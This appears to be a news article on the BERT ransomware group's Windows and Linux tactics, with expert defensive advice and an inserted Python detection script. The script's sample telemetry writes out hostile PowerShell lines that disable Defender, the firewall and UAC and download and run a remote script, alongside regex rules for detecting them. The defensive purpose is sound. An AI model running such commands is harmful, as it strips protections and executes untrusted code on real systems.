A new threat actor, BERT, has emerged as a fast-moving ransomware group that has rapidly expanded its activity across Asia, Europe, and the US. Discovered in April, BERT is targeting both Windows and Linux systems.
Tracked by Trend Micro as “Water Pombero,” the group is targeting critical infrastructure sectors such as healthcare, technology, and event services.
In its Windows variants, the BERT ransomware uses a straightforward code structure with hard-coded strings to identify and terminate specific processes. During its investigation, Trend Micro discovered a PowerShell script that functions as a loader for the BERT ransomware payload.
The script escalates privileges, disables Windows Defender, the firewall, and user account control, then downloads and executes the ransomware from the remote IP address 185[.]100[.]157[.]74. However, the exact initial access method remains unclear, Trend Micro said in a blog post.
On Linux systems, BERT utilizes 50 concurrent threads to maximize encryption speed, allowing it to quickly encrypt files across the system while minimizing the chances of detection or interruption. Most notably, it can shut down ESXi virtual machines, Trend Micro said.
A wake-up call
BERT does not deploy sophisticated code, but the group’s tools and tactics are designed for speed and impact, making them a growing concern for security professionals worldwide.
“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BERT ransomware is dangerous despite its simplicity because it’s fast, disables security tools and firewalls, and is easy for attackers to use. Its creators constantly improve it, making it harder to detect and stop, he added.
For CSOs, these tactics should serve as red flags: even basic scripting and commodity tools can bypass enterprise defenses when executed precisely against configuration weaknesses.
“Security teams should closely monitor PowerShell sessions that attempt to download remote code or disable security tools, as well as any user account control bypass efforts. Activity around ESXi and vCenter logs, particularly bulk virtual machine shutdowns, should raise immediate red flags. Canary files, which can act as tripwires for early detection, are also critical,” said Amit Jaju, senior managing director at Ankura Consulting.
Jaju suggested that CISOs should enforce Constrained Language Mode for PowerShell, adopt just-in-time admin privileges, monitor hypervisor APIs for unusual behavior, and implement scripted playbooks for rapid containment, ideally within 15 minutes of detection.
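As an added illustration of the monitoring Jaju describes (this is not code from Trend Micro or from the article), the Python script below scans constructed sample telemetry for the loader behaviours named above (disabling Defender, the firewall and UAC, and pulling remote code) and flags bulk ESXi power-offs inside a short window; the log format, field names and thresholds are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs) in an assumed "timestamp|source|message"
# form: PowerShell script-block text plus simplified hypervisor audit lines.
SAMPLE_EVENTS = [
    "2025-06-01T10:00:01|powershell|Set-MpPreference -DisableRealtimeMonitoring $true",
    "2025-06-01T10:00:02|powershell|netsh advfirewall set allprofiles state off",
    "2025-06-01T10:00:03|powershell|reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f",
    "2025-06-01T10:00:04|powershell|IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')",
    "2025-06-01T10:00:05|powershell|Get-ChildItem C:\\Reports",
    "2025-06-01T10:07:00|esxi|vm-101 powered off by root",
    "2025-06-01T10:07:05|esxi|vm-102 powered off by root",
    "2025-06-01T10:07:09|esxi|vm-103 powered off by root",
    "2025-06-01T15:00:00|esxi|vm-104 powered off by root",
]

# Regex rules mirroring the loader behaviours the article says to watch for.
POWERSHELL_RULES = {
    "defender_disabled": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "firewall_disabled": re.compile(r"netsh\s+advfirewall\s+set\s+.*state\s+off", re.I),
    "uac_disabled": re.compile(r"EnableLUA\b.*/d\s+0\b", re.I),
    "remote_code_download": re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
}

def parse(line):
    ts, source, msg = line.split("|", 2)
    return datetime.fromisoformat(ts), source, msg

def scan_events(events, window=timedelta(seconds=60), bulk_threshold=3):
    """Return (timestamp, rule) findings: PowerShell indicator hits plus bulk VM shutdowns."""
    findings = []
    poweroff_times = []
    for line in events:
        ts, source, msg = parse(line)
        if source == "powershell":
            findings += [(ts, name) for name, rx in POWERSHELL_RULES.items() if rx.search(msg)]
        elif source == "esxi" and "powered off" in msg:
            # Sliding window: keep only power-offs within `window` of this event,
            # and alert when the count first reaches the bulk threshold.
            poweroff_times = [t for t in poweroff_times if ts - t <= window] + [ts]
            if len(poweroff_times) == bulk_threshold:
                findings.append((ts, "bulk_vm_shutdown"))
    return findings

if __name__ == "__main__":
    for ts, rule in scan_events(SAMPLE_EVENTS):
        print(ts.isoformat(), rule)
```

In production the same rules would run over PowerShell script-block logging (Event ID 4104) and vCenter/ESXi task events rather than a pipe-delimited list.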
To strengthen defenses, SOC teams and CISOs must also assume breaches will happen and focus on fast detection and response. “Deploy layered security like EDR/XDR, network segmentation, and strict privilege controls; enforce application allowlisting; maintain isolated, regularly tested backups; patch vulnerabilities promptly; train employees on phishing and threat awareness; and implement proactive threat hunting and incident response drills,” added Jain.
Low-code, high impact
BERT is not an isolated development — it is part of a growing wave of emerging ransomware groups that are proving both capable and elusive. In just the last three to four months, cybersecurity researchers have identified multiple new ransomware families that signal a shift toward leaner, low-code, and faster malware operations.
For instance, Gunra ransomware, spotted in April, appends a .encrt extension to encrypted files and drops a ransom note named r3adm3.txt in multiple directories, and has claimed to target healthcare, electronics, and beverage manufacturing sectors.
Silent ransomware group, known for callback phishing emails that masquerade as well-known businesses offering subscription plans, has changed tactics: it now steals sensitive data such as customer records, phone numbers, intellectual property, and internal emails, and only then triggers a ransom demand.
“CISOs are now contending with two emerging archetypes of ransomware: ‘loud-lockers’ like the Gunra group that use multithreading and anti-recovery routines to lock down systems instantly, and ‘quiet siphoners’ like the Silent Ransom group who avoid malware entirely. Groups like Mamona represent a third hybrid—quick but malware-light, often operating offline and deleting traces post-execution,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research.
Gogia added that this evolution demands layered defences that prioritise blast radius containment, process forensics, and deception-based detection. Legacy AV, EDR, and perimeter tools alone cannot keep pace with this modular, multi-variant model of threat execution.